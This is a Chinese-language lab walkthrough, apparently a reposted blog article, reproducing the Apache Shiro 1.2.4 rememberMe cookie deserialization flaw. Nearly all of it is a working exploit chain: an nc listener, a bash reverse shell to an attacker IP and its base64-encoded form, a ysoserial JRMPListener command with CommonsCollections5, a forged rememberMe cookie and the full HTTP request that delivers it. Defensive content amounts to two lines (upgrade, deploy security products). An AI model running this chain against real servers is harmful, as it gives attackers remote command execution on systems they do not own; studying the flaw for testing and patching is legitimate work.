Shiro1.2.4反序列化漏洞
目錄- Shiro1.2.4反序列化漏洞
- 一、JRMP協議
- 二、漏洞原理
- 三、復現步驟
- 四、修復和防御
一、JRMP協議
? JRMP全稱為Java Remote Method Protocol,也就是Java遠程方法協議,是RMI(Remote Method Invocation)作業的底層協議,
二、漏洞原理
? Apache Shiro 1.2.4及以前版本中,加密的用戶資訊序列化后存盤在名為remember-me的Cookie中,攻擊者可以使用Shiro的默認密鑰偽造用戶Cookie,觸發Java反序列化漏洞,進而在目標機器上執行任意命令,
個人理解:(不一定正確)
Apache Shiro反序列化漏洞,主要是因為用戶的資訊通過序列化、AES加密,base64加密后存盤在Cookie的remember-me欄位中,而攻擊者可以通過構造remember-me欄位中的引數,當傳到后端服務器時,服務器會對remember-me欄位進行base64解密,AES解密,反序列化去連接JRMP服務,當訪問到JRMP服務時,會發送一個base64編碼的反彈連接給服務器,服務器解碼就會自動執行反彈連接,這里AES加密密鑰是固定的,也是造成原因的一部分原因,
三、復現步驟
1、kali(192.168.142.133)上監聽6666埠
nc -lvp 6666
2、對反彈連接進行編碼
編碼網址:https://ares-x.com/tools/runtime-exec/
bash -i >& /dev/tcp/192.168.142.133/6666 0>&1
編碼后:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Mi4xMzMvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}
3、用ysoserial開啟JRMP監聽(可在windows上運行,也可在linux上運行)
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 8888 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Mi4xMzMvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}"
4、用shiro.py腳本進行AES加密、base64編碼
python shiro.py 192.168.142.1:8888
輸出內容為:
rememberMe=kcsXiGTWRTCTQnw3pjWUu0gg0tCiFg+TYpRxFUG5VkeiW5Mikx9fazx/UVsHKg3jYm0wZ0/N7Im4w0pJheg4n0TvApMQsFzcR6+I4uA+Fow1hR1iLMxhLVixyZdUEj5zwBqOXnK+Ju3ikfry+wwqscqtkzjZFe40uI+Fxdynw7bi4sCA6SY48UULNiIdeVRrwvqe7nfA+ZihSolHG4UaTvX+ySSiYzBfqKsN5RJWPbvzUWvSXXdaQE0ch7jtCYxYw+vTcSrEW9yj94KgJPQa6ZqaTbFFqG08obLGxGVJ5v2h+XGHro4wxkg0HiY+gkfgdLEt8gGcLmd3IJSLzlOWnv9KBnYN7vfXpfuZ7/P5tA3VIVapyFjx3qvY4zkSc/Q/VGuUis75k856P3Af3q+HwA==
5、用bp發送payload
POST /doLogin HTTP/1.1
Host: 192.168.142.133:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://192.168.142.133:8080
Connection: close
Referer: http://192.168.142.133:8080/login;jsessionid=0B0A2E71C16C929317001BA8542BD94E
Cookie: JSESSIONID=0B0A2E71C16C929317001BA8542BD94E;rememberMe=kcsXiGTWRTCTQnw3pjWUu0gg0tCiFg+TYpRxFUG5VkeiW5Mikx9fazx/UVsHKg3jYm0wZ0/N7Im4w0pJheg4n0TvApMQsFzcR6+I4uA+Fow1hR1iLMxhLVixyZdUEj5zwBqOXnK+Ju3ikfry+wwqscqtkzjZFe40uI+Fxdynw7bi4sCA6SY48UULNiIdeVRrwvqe7nfA+ZihSolHG4UaTvX+ySSiYzBfqKsN5RJWPbvzUWvSXXdaQE0ch7jtCYxYw+vTcSrEW9yj94KgJPQa6ZqaTbFFqG08obLGxGVJ5v2h+XGHro4wxkg0HiY+gkfgdLEt8gGcLmd3IJSLzlOWnv9KBnYN7vfXpfuZ7/P5tA3VIVapyFjx3qvY4zkSc/Q/VGuUis75k856P3Af3q+HwA==
Upgrade-Insecure-Requests: 1
username=1&password=1&rememberme=remember-me
四、修復和防御
1、升級Apache Shiro
2、部署安全產品
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/551469.html
標籤:其他
下一篇:返回列表